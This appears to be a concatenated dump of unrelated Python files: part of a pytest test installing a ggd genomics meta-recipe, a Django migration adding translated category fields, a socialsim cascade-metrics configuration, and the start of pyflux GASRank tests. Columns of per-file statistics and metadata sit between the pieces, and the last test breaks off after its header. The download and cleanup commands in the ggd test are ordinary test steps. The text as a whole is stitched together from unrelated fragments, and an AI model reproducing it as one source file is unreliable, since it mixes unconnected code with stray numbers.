    _remove_env(env_name, temp_env)
    _install_and_verify(env_name, temp_env, env_name)
    _remove_env(env_name, temp_env)
    assert os.path.exists(temp_env) == False
def test_install_meta_recipe():
pytest_enable_socket()
import tarfile
import tempfile
from ggd import check_recipe
tmpdir = tempfile.mkdtemp()
recipe_path = os.path.join(tmpdir,"meta-recipe-geo-accession-geo-v1")
os.mkdir(recipe_path)
## Download files
try:
## checkusm
sp.check_call(["wget",
"https://raw.githubusercontent.com/gogetdata/ggd-recipes/master/recipes/genomics/meta-recipe/meta-recipe/meta-recipe-geo-accession-geo-v1/checksums_file.txt",
"--directory-prefix",
recipe_path])
## meta.yaml
sp.check_call(["wget",
"https://raw.githubusercontent.com/gogetdata/ggd-recipes/master/recipes/genomics/meta-recipe/meta-recipe/meta-recipe-geo-accession-geo-v1/meta.yaml",
"--directory-prefix",
recipe_path])
## metarecipe.sh
sp.check_call(["wget",
"https://raw.githubusercontent.com/gogetdata/ggd-recipes/master/recipes/genomics/meta-recipe/meta-recipe/meta-recipe-geo-accession-geo-v1/metarecipe.sh",
"--directory-prefix",
recipe_path])
## head parser
sp.check_call(["wget",
"https://raw.githubusercontent.com/gogetdata/ggd-recipes/master/recipes/genomics/meta-recipe/meta-recipe/meta-recipe-geo-accession-geo-v1/parse_geo_header.py",
"--directory-prefix",
recipe_path])
## Post link
sp.check_call(["wget",
"https://raw.githubusercontent.com/gogetdata/ggd-recipes/master/recipes/genomics/meta-recipe/meta-recipe/meta-recipe-geo-accession-geo-v1/post-link.sh",
"--directory-prefix",
recipe_path])
## recipe.sh
sp.check_call(["wget",
"https://raw.githubusercontent.com/gogetdata/ggd-recipes/master/recipes/genomics/meta-recipe/meta-recipe/meta-recipe-geo-accession-geo-v1/recipe.sh",
"--directory-prefix",
recipe_path])
except sp.CalledProcessError as e:
print(str(e))
assert False
## Original yaml
orig_yaml = yaml.safe_load(open(os.path.join(recipe_path, "meta.yaml")))
tarball_file_path = check_recipe._build(recipe_path,orig_yaml)
assert os.path.isfile(tarball_file_path)
## Test install good install with meta-recipe
recipes = ["meta-recipe-geo-accession-geo-v1"]
args = Namespace(channel='genomics', command='install', debug=False, name=recipes, file=[], prefix=None, id = "GSE123")
## Test install with a meta-recipe but no id
assert install.install((), args)
## Check for update in the ecipe and yaml files
recipe_contents = ""
yaml_dict = {}
with tarfile.open(os.path.join(utils.conda_root(),"pkgs",os.path.basename(tarball_file_path.replace("meta-recipe-geo-accession-geo-v1","gse123-geo-v1"))), mode="r|bz2") as tf:
for info in tf:
if info.name == "info/recipe/recipe.sh":
recipe_contents = tf.extractfile(info)
recipe_contents = recipe_contents.read().decode()
elif info.name == "info/recipe/meta.yaml.template":
yaml_dict = tf.extractfile(info)
yaml_dict = yaml.safe_load(yaml_dict.read().decode())
## Check the recipe contents
assert recipe_contents == (
"""
curl "https://ftp.ncbi.nlm.nih.gov/geo/series/GSEnnn/GSE123/soft/GSE123_family.soft.gz" -O -J --silent
curl "https://ftp.ncbi.nlm.nih.gov/geo/series/GSEnnn/GSE123/matrix/GSE123_series_matrix.txt.gz" -O -J --silent
curl "https://ftp.ncbi.nlm.nih.gov/geo/series/GSEnnn/GSE123/suppl/GSE123_RAW.tar" -O -J --silent
tar -xf GSE123_RAW.tar
""")
## check the yaml file
assert yaml_dict["build"]["noarch"] == orig_yaml["build"]["noarch"]
assert yaml_dict["build"]["number"] == orig_yaml["build"]["number"]
assert yaml_dict["package"]["name"] != orig_yaml["package"]["name"]
assert yaml_dict["package"]["name"] == "gse123-geo-v1"
assert yaml_dict["package"]["version"] == orig_yaml["package"]["version"]
assert yaml_dict["about"]["identifiers"]["genome-build"] == orig_yaml["about"]["identifiers"]["genome-build"]
assert yaml_dict["about"]["identifiers"]["species"] == orig_yaml["about"]["identifiers"]["species"]
assert "updated-species" in yaml_dict["about"]["identifiers"]
assert yaml_dict["about"]["identifiers"]["updated-species"] == "Mus musculus"
assert "parent-meta-recipe" in yaml_dict["about"]["identifiers"]
assert yaml_dict["about"]["identifiers"]["parent-meta-recipe"] == "meta-recipe-geo-accession-geo-v1"
assert yaml_dict["about"]["keywords"] != orig_yaml["about"]["keywords"]
assert yaml_dict["about"]["summary"] != orig_yaml["about"]["summary"]
assert yaml_dict["about"]["tags"]["data-provider"] == orig_yaml["about"]["tags"]["data-provider"]
assert yaml_dict["about"]["tags"]["data-version"] != orig_yaml["about"]["tags"]["data-version"]
assert yaml_dict["about"]["tags"]["genomic-coordinate-base"] == orig_yaml["about"]["tags"]["genomic-coordinate-base"]
## Check the installed files
species = "meta-recipe"
build = "meta-recipe"
name = "gse123-geo-v1"
version = "1"
assert os.path.exists(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version))
assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,"GSE123_family.soft.gz"))
assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,"GSE123_series_matrix.txt.gz")) ## From TAR file
assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,"GSM3227_jzo026-rp1-v5-u74av2.CEL.gz")) ## From TAR file
assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,"GSM3225_jzo016-rp1-v5-u74av2.CEL.gz")) ## From TAR file
assert not os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,"GSE123_RAW.tar")) ## Tar file should not exists after install it
## Check that the file is in ggd list
from ggd import list_installed_pkgs
args = Namespace(command='list', pattern="gse123-geo-v1", prefix=None, reset=False)
temp_stdout = StringIO()
with redirect_stdout(temp_stdout):
list_installed_pkgs.list_installed_packages((), args)
output = temp_stdout.getvalue().strip()
assert "gse123-geo-v1" in output
## test the it can be uninstalled
try:
sp.check_call(["ggd", "uninstall", "gse123-geo-v1"])
except subprocess.CalledProcessError as e:
print(str(e))
assert False
## Temp different conda environment
temp_env = os.path.join(utils.conda_root(), "envs", "temp_geo_meta_recipe")
### Remove temp env if it already exists
sp.check_output(["conda", "env", "remove", "--name", "temp_geo_meta_recipe"])
try:
shutil.rmtree(temp_env)
except Exception:
pass
### Create the temp environment
sp.check_output(["conda", "create", "--name", "temp_geo_meta_recipe"])
recipes = ["meta-recipe-geo-accession-geo-v1"]
args = Namespace(channel='genomics', command='install', debug=False, name=recipes, file=[], prefix=temp_env, id = "GSE123")
## Test install with a meta-recipe but no id
assert install.install((), args)
## Check for update in the ecipe and yaml files
recipe_contents = ""
yaml_dict = {}
with tarfile.open(os.path.join(temp_env,"pkgs",os.path.basename(tarball_file_path.replace("meta-recipe-geo-accession-geo-v1","gse123-geo-v1"))), mode="r|bz2") as tf:
for info in tf:
if info.name == "info/recipe/recipe.sh":
recipe_contents = tf.extractfile(info)
recipe_contents = recipe_contents.read().decode()
elif info.name == "info/recipe/meta.yaml.template":
yaml_dict = tf.extractfile(info)
yaml_dict = yaml.safe_load(yaml_dict.read().decode())
## Check the recipe contents
assert recipe_contents == (
"""
curl "https://ftp.ncbi.nlm.nih.gov/geo/series/GSEnnn/GSE123/soft/GSE123_family.soft.gz" -O -J --silent
curl "https://ftp.ncbi.nlm.nih.gov/geo/series/GSEnnn/GSE123/matrix/GSE123_series_matrix.txt.gz" -O -J --silent
curl "https://ftp.ncbi.nlm.nih.gov/geo/series/GSEnnn/GSE123/suppl/GSE123_RAW.tar" -O -J --silent
tar -xf GSE123_RAW.tar
""")
## check the yaml file
assert yaml_dict["build"]["noarch"] == orig_yaml["build"]["noarch"]
assert yaml_dict["build"]["number"] == orig_yaml["build"]["number"]
assert yaml_dict["package"]["name"] != orig_yaml["package"]["name"]
assert yaml_dict["package"]["name"] == "gse123-geo-v1"
assert yaml_dict["package"]["version"] == orig_yaml["package"]["version"]
assert yaml_dict["about"]["identifiers"]["genome-build"] == orig_yaml["about"]["identifiers"]["genome-build"]
assert yaml_dict["about"]["identifiers"]["species"] == orig_yaml["about"]["identifiers"]["species"]
assert "updated-species" in yaml_dict["about"]["identifiers"]
assert yaml_dict["about"]["identifiers"]["updated-species"] == "Mus musculus"
assert "parent-meta-recipe" in yaml_dict["about"]["identifiers"]
assert yaml_dict["about"]["identifiers"]["parent-meta-recipe"] == "meta-recipe-geo-accession-geo-v1"
assert yaml_dict["about"]["keywords"] != orig_yaml["about"]["keywords"]
assert yaml_dict["about"]["summary"] != orig_yaml["about"]["summary"]
assert yaml_dict["about"]["tags"]["data-provider"] == orig_yaml["about"]["tags"]["data-provider"]
assert yaml_dict["about"]["tags"]["data-version"] != orig_yaml["about"]["tags"]["data-version"]
assert yaml_dict["about"]["tags"]["genomic-coordinate-base"] == orig_yaml["about"]["tags"]["genomic-coordinate-base"]
## Check the installed files
species = "meta-recipe"
build = "meta-recipe"
name = "gse123-geo-v1"
version = "1"
assert os.path.exists(os.path.join(temp_env,"share","ggd",species,build,name,version))
assert os.path.isfile(os.path.join(temp_env,"share","ggd",species,build,name,version,"GSE123_family.soft.gz"))
assert os.path.isfile(os.path.join(temp_env,"share","ggd",species,build,name,version,"GSE123_series_matrix.txt.gz")) ## From TAR file
assert os.path.isfile(os.path.join(temp_env,"share","ggd",species,build,name,version,"GSM3227_jzo026-rp1-v5-u74av2.CEL.gz")) ## From TAR file
assert os.path.isfile(os.path.join(temp_env,"share","ggd",species,build,name,version,"GSM3225_jzo016-rp1-v5-u74av2.CEL.gz")) ## From TAR file
assert not os.path.isfile(os.path.join(temp_env,"share","ggd",species,build,name,version,"GSE123_RAW.tar")) ## Tar file should not exists after install it
## recipe should not be isntalled in the current environmnet
assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,"GSE123_family.soft.gz")) == False
assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,"GSE123_series_matrix.txt.gz")) == False## From TAR file
assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,"GSM3227_jzo026-rp1-v5-u74av2.CEL.gz")) == False ## From TAR file
assert os.path.isfile(os.path.join(utils.conda_root(),"share","ggd",species,build,name,version,"GSM3225_jzo016-rp1-v5-u74av2.CEL.gz")) == False ## From TAR file
## Check that the file is in ggd list
from ggd import list_installed_pkgs
args = Namespace(command='list', pattern="gse123-geo-v1", prefix=temp_env, reset=False)
temp_stdout = StringIO()
with redirect_stdout(temp_stdout):
list_installed_pkgs.list_installed_packages((), args)
output = temp_stdout.getvalue().strip()
assert "gse123-geo-v1" in output
### Remove temp env
sp.check_output(["conda", "env", "remove", "--name", "temp_geo_meta_recipe"])
try:
shutil.rmtree(temp_env)
except Exception:
pass
assert os.path.exists(temp_env) == False
## Test install without
recipes = ["meta-recipe-geo-accession-geo-v1"]
args = Namespace(channel='genomics', command='install', debug=False, name=recipes, file=[], prefix=None, id = None)
## Test install with a meta-recipe but no id
temp_stdout = StringIO()
with pytest.raises(SystemExit) as pytest_wrapped_e, redirect_stdout(temp_stdout):
install.install((), args)
assert "SystemExit" in str(pytest_wrapped_e.exconly()) ## test that SystemExit was raised by sys.exit()
output = temp_stdout.getvalue().strip()
assert ":ggd:install: {} is a meta-recipe. Checking meta-recipe for installation".format("meta-recipe-geo-accession-geo-v1") in output
assert ":ggd:install: An ID is required in order to install a GGD meta-recipe. Please add the '--id <Some ID>' flag and try again" in output
## Test install with mutliple packages
recipes = ["grch37-chromsizes-ggd-v1","meta-recipe-geo-accession-geo-v1"]
args = Namespace(channel='genomics', command='install', debug=False, name=recipes, file=[], prefix=None, id = "GSE123")
## Test install with a meta-recipe but no id
temp_stdout = StringIO()
with pytest.raises(SystemExit) as pytest_wrapped_e, redirect_stdout(temp_stdout):
install.install((), args)
assert "SystemExit" in str(pytest_wrapped_e.exconly()) ## test that SystemExit was raised by sys.exit()
output = temp_stdout.getvalue().strip()
assert ":ggd:install: Looking for grch37-chromsizes-ggd-v1 in the 'ggd-genomics' channel" in output
assert ":ggd:install: grch37-chromsizes-ggd-v1 version 1 is not installed on your system" in output
assert ":ggd:install: grch37-chromsizes-ggd-v1 has not been installed by conda" in output
assert ":ggd:install: Looking for meta-recipe-geo-accession-geo-v1 in the 'ggd-genomics' channel" in output
assert ":ggd:install: meta-recipe-geo-accession-geo-v1 exists in the ggd-genomics channel" in output
assert ":ggd:install: meta-recipe-geo-accession-geo-v1 is a meta-recipe. Checking meta-recipe for installation" in output
assert ":ggd:install: GGD is currently only able to install a single meta-recipe at a time. Please remove other pkgs and install them with a subsequent command" in output
## Remove tmp dir
if os.path.exists(tmpdir):
shutil.rmtree(tmpdir)
| 48.792538
| 388
| 0.650443
| 16,021
| 119,005
| 4.694214
| 0.037076
| 0.024812
| 0.022206
| 0.019214
| 0.888945
| 0.871114
| 0.853629
| 0.83738
| 0.821743
| 0.80697
| 0
| 0.016779
| 0.195193
| 119,005
| 2,438
| 389
| 48.812551
| 0.768449
| 0.152994
| 0
| 0.780726
| 0
| 0.03352
| 0.30468
| 0.051537
| 0
| 0
| 0
| 0
| 0.25419
| 1
| 0.023743
| false
| 0.026536
| 0.030028
| 0
| 0.053771
| 0.005587
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4dc3d90da33d331cef6b0eb1065c97fb71d8d868
| 2,191
|
py
|
Python
|
openbook_categories/migrations/0008_auto_20190808_1719.py
|
TamaraAbells/okuna-api
|
f87d8e80d2f182c01dbce68155ded0078ee707e4
|
[
"MIT"
] | 164
|
2019-07-29T17:59:06.000Z
|
2022-03-19T21:36:01.000Z
|
openbook_categories/migrations/0008_auto_20190808_1719.py
|
TamaraAbells/okuna-api
|
f87d8e80d2f182c01dbce68155ded0078ee707e4
|
[
"MIT"
] | 188
|
2019-03-16T09:53:25.000Z
|
2019-07-25T14:57:24.000Z
|
openbook_categories/migrations/0008_auto_20190808_1719.py
|
TamaraAbells/okuna-api
|
f87d8e80d2f182c01dbce68155ded0078ee707e4
|
[
"MIT"
] | 80
|
2019-08-03T17:49:08.000Z
|
2022-02-28T16:56:33.000Z
|
# Generated by Django 2.2.4 on 2019-08-08 15:19
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add translated ``description_*`` and ``title_*`` columns to Category.

    One nullable CharField per (base field, locale) pair for the fr, it,
    pt_br, sv and tr translations. Auto-generated by Django; the ten
    duplicated AddField blocks are collapsed into a single comprehension.
    """

    dependencies = [
        ('openbook_categories', '0007_auto_20190801_1255'),
    ]

    # Order matches the generated original: all description_* fields first,
    # then all title_* fields, each iterating locales fr, it, pt_br, sv, tr.
    operations = [
        migrations.AddField(
            model_name='category',
            name='%s_%s' % (base, locale),
            field=models.CharField(max_length=64, null=True, verbose_name=base),
        )
        for base in ('description', 'title')
        for locale in ('fr', 'it', 'pt_br', 'sv', 'tr')
    ]
| 34.234375
| 89
| 0.584665
| 222
| 2,191
| 5.563063
| 0.202703
| 0.145749
| 0.186235
| 0.218623
| 0.869636
| 0.869636
| 0.869636
| 0.825101
| 0.825101
| 0.825101
| 0
| 0.032967
| 0.29393
| 2,191
| 63
| 90
| 34.777778
| 0.765352
| 0.020539
| 0
| 0.701754
| 1
| 0
| 0.148321
| 0.010728
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.017544
| 0
| 0.070175
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
4dfe94b6ae401042d33ed8d3f776ae479ec32eb6
| 23,029
|
py
|
Python
|
december-measurements/config/cascade_metrics_config_twitter.py
|
diogofpacheco/socialsim
|
4ca3625ce62321804864bd25fc3cb80d9adc16c5
|
[
"BSD-2-Clause"
] | 25
|
2018-03-27T20:59:09.000Z
|
2021-05-25T18:37:46.000Z
|
december-measurements/config/cascade_metrics_config_twitter.py
|
diogofpacheco/socialsim
|
4ca3625ce62321804864bd25fc3cb80d9adc16c5
|
[
"BSD-2-Clause"
] | 27
|
2018-04-18T15:54:50.000Z
|
2019-11-22T19:52:19.000Z
|
december-measurements/config/cascade_metrics_config_twitter.py
|
diogofpacheco/socialsim
|
4ca3625ce62321804864bd25fc3cb80d9adc16c5
|
[
"BSD-2-Clause"
] | 11
|
2018-04-09T18:12:32.000Z
|
2022-01-26T06:31:17.000Z
|
import Metrics
from functools import partial, update_wrapper
def named_partial(func, *args, **kwargs):
    """Build a ``functools.partial`` of *func* that keeps its identity.

    The returned partial carries the wrapped function's metadata (name,
    docstring, etc. via ``update_wrapper``) plus a ``varnames`` attribute
    copied from ``func.__code__.co_varnames``.
    """
    bound = partial(func, *args, **kwargs)
    update_wrapper(bound, func)
    bound.varnames = func.__code__.co_varnames
    return bound
def get_node_level_measurements_params(time_granularity):
    """
    Return params dictionary for node level (i.e. cascade) measurements
    for the given cascade passed by root_id

    :param time_granularity: "Y", "M", "D", "H" [years/months/days/hours] for timeseries measurements
    :return: node_level_measurement_params
    """
    # The original file repeated the same 9-key entry dict 11 times; the
    # helpers below build identical entries without the duplication.

    def _ts_metrics(fill_value):
        # rmse/nrmse/r2 on outer-joined timeseries with the given fill value.
        return {"rmse": named_partial(Metrics.rmse, join='outer', fill_value=fill_value),
                "nrmse": named_partial(Metrics.rmse, join='outer', fill_value=fill_value, relative=True),
                "r2": named_partial(Metrics.r2, join='outer', fill_value=fill_value)}

    def _depth_metrics():
        # Same trio but without a fill value (values indexed by depth, not time).
        return {"rmse": named_partial(Metrics.rmse, join='outer'),
                "nrmse": named_partial(Metrics.rmse, join='outer', relative=True),
                "r2": named_partial(Metrics.r2, join='outer')}

    def _scalar_metrics():
        # Scalar comparisons for single-number measurements (gini/palma).
        return {"absolute_percentage_error": Metrics.absolute_percentage_error,
                "absolute_difference": Metrics.absolute_difference}

    def _entry(measurement_args, metrics, temporal_vs_batch):
        # Common shell shared by every node-level entry.
        return {"scale": "node",
                "node_type": "Cascade",
                "scenario1": False,
                "scenario2": True,
                "scenario3": False,
                "measurement": "get_node_level_measurements",
                "measurement_args": measurement_args,
                "metrics": metrics,
                "temporal_vs_batch": temporal_vs_batch}

    def _timeseries(attribute, fill_value):
        return _entry({"single_cascade_measurement": "cascade_timeseries_of",
                       "attribute": attribute,
                       "time_granularity": time_granularity},
                      _ts_metrics(fill_value), "Temporal")

    def _by_depth(attribute):
        return _entry({"single_cascade_measurement": "cascade_depth_by",
                       "attribute": attribute},
                      _depth_metrics(), "Batch")

    # ["depth", "breadth", "size", "structural_virality", "unique_nodes", "new_node_ratio"])
    return {
        "cascade_max_depth_over_time": _timeseries("depth", "ffill"),
        "cascade_breadth_by_time": _timeseries("breadth", "ffill"),
        # Ratio/virality series fill gaps with 0 rather than forward-fill.
        "cascade_structural_virality_over_time": _timeseries("structural_virality", 0),
        "cascade_size_over_time": _timeseries("size", "ffill"),
        "cascade_uniq_users_by_time": _timeseries("unique_nodes", "ffill"),
        "cascade_new_user_ratio_by_time": _timeseries("new_node_ratio", 0),
        "cascade_breadth_by_depth": _by_depth("breadth"),
        "cascade_new_user_ratio_by_depth": _by_depth("new_node_ratio"),
        "cascade_uniq_users_by_depth": _by_depth("unique_nodes"),
        "cascade_participation_gini": _entry(
            {"single_cascade_measurement": "cascade_participation_gini"},
            _scalar_metrics(), "Batch"),
        "cascade_participation_palma": _entry(
            {"single_cascade_measurement": "cascade_participation_palma"},
            _scalar_metrics(), "Batch"),
    }
def get_community_level_measurements_params(time_granularity="M"):
    """
    Return params dictionary for community (i.e. subreddit) measurements
    for the given community passed by community_id

    :param time_granularity: "Y", "M", "D", "H" [years/months/days/hours] for timeseries measurements
    :return: community_measurement_params
    """
    # Helpers remove the per-entry duplication of the original literal dict.

    def _entry(measurement, measurement_args, metrics, temporal_vs_batch):
        # Common shell shared by every community-level entry.
        return {"scale": "community",
                "node_type": "Cascade",
                "scenario1": False,
                "scenario2": True,
                "scenario3": True,
                "measurement": measurement,
                "measurement_args": measurement_args,
                "metrics": metrics,
                "temporal_vs_batch": temporal_vs_batch}

    def _js_metrics():
        return {"js_divergence": named_partial(Metrics.js_divergence, discrete=False)}

    def _ts_metrics(fill_value):
        return {"rmse": named_partial(Metrics.rmse, join='outer', fill_value=fill_value),
                "nrmse": named_partial(Metrics.rmse, join='outer', fill_value=fill_value, relative=True),
                "r2": named_partial(Metrics.r2, join='outer', fill_value=fill_value)}

    def _scalar_metrics():
        return {"absolute_percentage_error": Metrics.absolute_percentage_error,
                "absolute_difference": Metrics.absolute_difference}

    def _distribution(attribute):
        # Per-community distribution of a cascade attribute, compared by JS divergence.
        return _entry("cascade_collection_distribution_of",
                      {"attribute": attribute, "community_grouper": "communityID"},
                      _js_metrics(), "Batch")

    def _users_count(attribute, fill_value):
        return _entry("community_users_count",
                      {"attribute": attribute, "community_grouper": "communityID",
                       "time_granularity": time_granularity},
                      _ts_metrics(fill_value), "Temporal")

    def _inequality(measurement):
        return _entry(measurement, {"community_grouper": "communityID"},
                      _scalar_metrics(), "Batch")

    grouped_ts_args = {"community_grouper": "communityID",
                       "time_granularity": time_granularity}

    return {
        "community_max_depth_distribution": _distribution("depth"),
        "community_max_breadth_distribution": _distribution("breadth"),
        "community_structural_virality_distribution": _distribution("structural_virality"),
        "community_cascade_size_distribution": _distribution("size"),
        # Lifetime distribution is the odd one out: compared with (n)rmse/r2
        # (no join/fill args) and marked Temporal, as in the original config.
        "community_cascade_lifetime_distribution": _entry(
            "cascade_collection_distribution_of",
            {"attribute": "lifetime", "community_grouper": "communityID"},
            {"rmse": Metrics.rmse,
             "nrmse": named_partial(Metrics.rmse, relative=True),
             "r2": Metrics.r2},
            "Temporal"),
        "community_cascade_size_timeseries": _entry(
            "get_cascade_collection_size_timeseries", dict(grouped_ts_args),
            _ts_metrics("ffill"), "Temporal"),
        "community_cascade_lifetime_timeseries": _entry(
            "get_cascade_collection_timeline_timeseries", dict(grouped_ts_args),
            _js_metrics(), "Batch"),
        "community_unique_users_by_time": _users_count("unique_users", "ffill"),
        "community_new_user_ratio_by_time": _users_count("new_user_ratio", 0),
        "community_cascade_initialization_gini": _inequality("cascade_collection_initialization_gini"),
        "community_cascade_initialization_palma": _inequality("cascade_collection_initialization_palma"),
        "community_cascade_participation_gini": _inequality("cascade_collection_participation_gini"),
        "community_cascade_participation_palma": _inequality("cascade_collection_participation_palma"),
    }
def get_population_level_measurements_params(time_granularity="M"):
    """
    Return params dictionary for population (i.e. all subreddits) measurements

    :param time_granularity: "Y", "M", "D", "H" [years/months/days/hours] for timeseries measurements
    :return: population_measurement_params
    """
    # Helpers remove the per-entry duplication of the original literal dict.

    def _entry(measurement, measurement_args, metrics, temporal_vs_batch):
        # Common shell shared by every population-level entry.
        return {"scale": "population",
                "node_type": "Cascade",
                "scenario1": False,
                "scenario2": True,
                "scenario3": True,
                "measurement": measurement,
                "measurement_args": measurement_args,
                "metrics": metrics,
                "temporal_vs_batch": temporal_vs_batch}

    def _distribution(attribute):
        # Population-wide distribution of a cascade attribute (JS divergence).
        return _entry("cascade_collection_distribution_of",
                      {"attribute": attribute},
                      {"js_divergence": named_partial(Metrics.js_divergence, discrete=False)},
                      "Batch")

    def _inequality(measurement):
        # Scalar gini/palma measurements take no measurement arguments here.
        return _entry(measurement, {},
                      {"absolute_percentage_error": Metrics.absolute_percentage_error,
                       "absolute_difference": Metrics.absolute_difference},
                      "Batch")

    return {
        "population_max_depth_distribution": _distribution("depth"),
        "population_max_breadth_distribution": _distribution("breadth"),
        "population_structural_virality_distribution": _distribution("structural_virality"),
        "population_cascade_size_distribution": _distribution("size"),
        "population_cascade_lifetime_distribution": _distribution("lifetime"),
        "population_cascade_size_timeseries": _entry(
            "get_cascade_collection_size_timeseries",
            {"time_granularity": time_granularity},
            {"rmse": named_partial(Metrics.rmse, join='outer', fill_value="ffill"),
             "nrmse": named_partial(Metrics.rmse, join='outer', fill_value="ffill", relative=True),
             "r2": named_partial(Metrics.r2, join='outer', fill_value="ffill")},
            "Temporal"),
        # Lifetime timeseries uses the outer-join metrics without a fill value.
        "population_cascade_lifetime_timeseries": _entry(
            "get_cascade_collection_timeline_timeseries",
            {"time_granularity": time_granularity},
            {"rmse": named_partial(Metrics.rmse, join='outer'),
             "nrmse": named_partial(Metrics.rmse, join='outer', relative=True),
             "r2": named_partial(Metrics.r2, join='outer')},
            "Temporal"),
        "population_cascade_initialization_gini": _inequality("cascade_collection_initialization_gini"),
        "population_cascade_initialization_palma": _inequality("cascade_collection_initialization_palma"),
        "population_cascade_participation_gini": _inequality("cascade_collection_participation_gini"),
        "population_cascade_participation_palma": _inequality("cascade_collection_participation_palma"),
    }
# Pre-built parameter sets for the Twitter cascade scenario: hourly node-level
# measurements, daily community- and population-level measurements.
cascade_node_params = get_node_level_measurements_params('H')
cascade_community_params = get_community_level_measurements_params('D')
cascade_population_params = get_population_level_measurements_params('D')

# The combined Twitter config deliberately merges only node- and
# population-level parameters; community-level parameters are excluded.
cascade_measurement_params_twitter = dict(cascade_node_params)
cascade_measurement_params_twitter.update(cascade_population_params)
| 47.778008
| 161
| 0.596856
| 2,046
| 23,029
| 6.371457
| 0.051808
| 0.049709
| 0.077248
| 0.064437
| 0.905186
| 0.885931
| 0.86683
| 0.862688
| 0.862688
| 0.862688
| 0
| 0.008553
| 0.268878
| 23,029
| 481
| 162
| 47.877339
| 0.765695
| 0.037127
| 0
| 0.731111
| 0
| 0
| 0.397465
| 0.13718
| 0
| 0
| 0
| 0
| 0
| 1
| 0.008889
| false
| 0
| 0.004444
| 0
| 0.022222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
150fffdffae0ec140080bb8e581bcc53de4b8fae
| 6,406
|
py
|
Python
|
pyflux/gas/tests/gas_rank_tests.py
|
ThomasHoppe/pyflux
|
297f2afc2095acd97c12e827dd500e8ea5da0c0f
|
[
"BSD-3-Clause"
] | 2,091
|
2016-04-01T02:52:10.000Z
|
2022-03-29T11:38:15.000Z
|
pyflux/gas/tests/gas_rank_tests.py
|
EricSchles/pyflux
|
297f2afc2095acd97c12e827dd500e8ea5da0c0f
|
[
"BSD-3-Clause"
] | 160
|
2016-04-26T14:52:18.000Z
|
2022-03-15T02:09:07.000Z
|
pyflux/gas/tests/gas_rank_tests.py
|
EricSchles/pyflux
|
297f2afc2095acd97c12e827dd500e8ea5da0c0f
|
[
"BSD-3-Clause"
] | 264
|
2016-05-02T14:03:31.000Z
|
2022-03-29T07:48:20.000Z
|
import numpy as np
import pyflux as pf
import pandas as pd
# Shared test fixture: NFL game results, fetched over the network at import time.
data = pd.read_csv("http://www.pyflux.com/notebooks/nfl_data_new.csv")
# Home-team margin of victory; used as the score_diff column for GASRank models.
data["PointsDiff"] = data["HomeScore"] - data["AwayScore"]
def test_mle():
    """
    Tests latent variable list length is correct, and that the estimated
    latent variables are not nan
    """
    model = pf.GASRank(data=data, team_1="HomeTeam", team_2="AwayTeam",
        score_diff="PointsDiff", family=pf.Normal())
    model.fit()  # default MLE fit; the unused `x =` assignment was removed
    assert(len(model.latent_variables.z_list) == 3)
    lvs = np.array([i.value for i in model.latent_variables.z_list])
    assert(len(lvs[np.isnan(lvs)]) == 0)
def test_mh():
    """
    Tests latent variable list length is correct, and that the estimated
    latent variables are not nan
    """
    model = pf.GASRank(data=data, team_1="HomeTeam", team_2="AwayTeam",
        score_diff="PointsDiff", family=pf.Normal())
    model.fit('M-H', nsims=200)  # unused `x =` assignment removed
    assert(len(model.latent_variables.z_list) == 3)
    lvs = np.array([i.value for i in model.latent_variables.z_list])
    assert(len(lvs[np.isnan(lvs)]) == 0)
def test_pml():
    """
    Tests latent variable list length is correct, and that the estimated
    latent variables are not nan
    """
    model = pf.GASRank(data=data, team_1="HomeTeam", team_2="AwayTeam",
        score_diff="PointsDiff", family=pf.Normal())
    model.fit('PML')  # unused `x =` assignment removed
    assert(len(model.latent_variables.z_list) == 3)
    lvs = np.array([i.value for i in model.latent_variables.z_list])
    assert(len(lvs[np.isnan(lvs)]) == 0)
def test_laplace():
    """
    Tests latent variable list length is correct, and that the estimated
    latent variables are not nan
    """
    model = pf.GASRank(data=data, team_1="HomeTeam", team_2="AwayTeam",
        score_diff="PointsDiff", family=pf.Normal())
    model.fit('Laplace')  # unused `x =` assignment removed
    assert(len(model.latent_variables.z_list) == 3)
    lvs = np.array([i.value for i in model.latent_variables.z_list])
    assert(len(lvs[np.isnan(lvs)]) == 0)
def test_bbvi():
    """
    Tests latent variable list length is correct, and that the estimated
    latent variables are not nan
    """
    model = pf.GASRank(data=data, team_1="HomeTeam", team_2="AwayTeam",
        score_diff="PointsDiff", family=pf.Normal())
    model.fit('BBVI', iterations=100)  # unused `x =` assignment removed
    assert(len(model.latent_variables.z_list) == 3)
    lvs = np.array([i.value for i in model.latent_variables.z_list])
    assert(len(lvs[np.isnan(lvs)]) == 0)
def test_predict():
    """Tests that a neutral-site prediction contains no nan values."""
    model = pf.GASRank(data=data, team_1="HomeTeam", team_2="AwayTeam",
        score_diff="PointsDiff", family=pf.Normal())
    model.fit()
    prediction = model.predict("Denver Broncos", "Carolina Panthers", neutral=True)
    assert(not np.isnan(prediction).any())
def test_mle_two_components():
